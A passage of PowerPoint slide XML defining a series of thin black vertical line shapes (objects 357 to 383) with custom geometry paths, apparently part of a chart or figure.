                  <a:pt x="273" y="569477"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="object 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5555803" y="4662216"/>
            <a:ext cx="0" cy="1028071"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="518794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="518761"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="object 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5553351" y="4661120"/>
            <a:ext cx="2517" cy="1029329"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="519430">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="519313"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="object 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583708" y="4648807"/>
            <a:ext cx="0" cy="1041913"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="525780">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="525526"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="object 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583435" y="4649055"/>
            <a:ext cx="0" cy="1041913"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="525780">
                <a:moveTo>
                  <a:pt x="0" y="525125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="525401"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="object 361"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5611616" y="4741600"/>
            <a:ext cx="0" cy="948795"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="478789">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="478695"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="object 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5611342" y="4743745"/>
            <a:ext cx="2517" cy="947537"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="478155">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="477618"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="object 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5639468" y="4756605"/>
            <a:ext cx="0" cy="933695"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="471169">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="471129"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="object 364"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638112" y="4756605"/>
            <a:ext cx="1258" cy="933695"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="471169">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="471129"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="object 365"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667374" y="4892296"/>
            <a:ext cx="0" cy="799051"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="403225">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="402649"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="object 366"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667101" y="4894184"/>
            <a:ext cx="1258" cy="796535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="401955">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="401702"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="object 367"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695228" y="4870846"/>
            <a:ext cx="0" cy="820443"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="414019">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="413473"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="object 368"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692776" y="4872734"/>
            <a:ext cx="2517" cy="817927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="412750">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="412526"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="object 369"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722586" y="5007591"/>
            <a:ext cx="0" cy="683283"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="344805">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="344469"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="object 370"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722314" y="5010818"/>
            <a:ext cx="1258" cy="679508"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="342900">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="342846"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="object 371"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5750492" y="5016136"/>
            <a:ext cx="0" cy="674475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="340360">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="340161"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="object 372"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5750218" y="5015044"/>
            <a:ext cx="2517" cy="675733"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="340994">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="340713"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="object 373"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5778344" y="5155560"/>
            <a:ext cx="0" cy="534798"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="269875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269804"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="object 374"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5777279" y="5154465"/>
            <a:ext cx="1258" cy="536057"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="270510">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="270356"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="object 375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5806252" y="5138423"/>
            <a:ext cx="0" cy="552415"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="278764">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="278447"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="object 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5805978" y="5140567"/>
            <a:ext cx="2517" cy="549898"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="277494">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="277370"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="object 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5834157" y="5227451"/>
            <a:ext cx="0" cy="463070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="233680">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="233521"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="object 378"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5831954" y="5227954"/>
            <a:ext cx="2517" cy="463070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="233680">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="233272"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="object 379"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5862009" y="5230634"/>
            <a:ext cx="0" cy="460556"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="232410">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="231919"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="object 380"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5861737" y="5229541"/>
            <a:ext cx="1258" cy="461814"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="233044">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="232471"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="object 381"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5889915" y="5294985"/>
            <a:ext cx="0" cy="396380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="200025">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="199446"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="object 382"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5889641" y="5293891"/>
            <a:ext cx="2517" cy="396380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="200025">
                <a:moveTo>
                  <a:pt x="1244" y="199722"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="199722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="199998"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="object 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5917769" y="5294480"/>
            <a:ext cx="0" cy="396380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="200025">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="199695"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
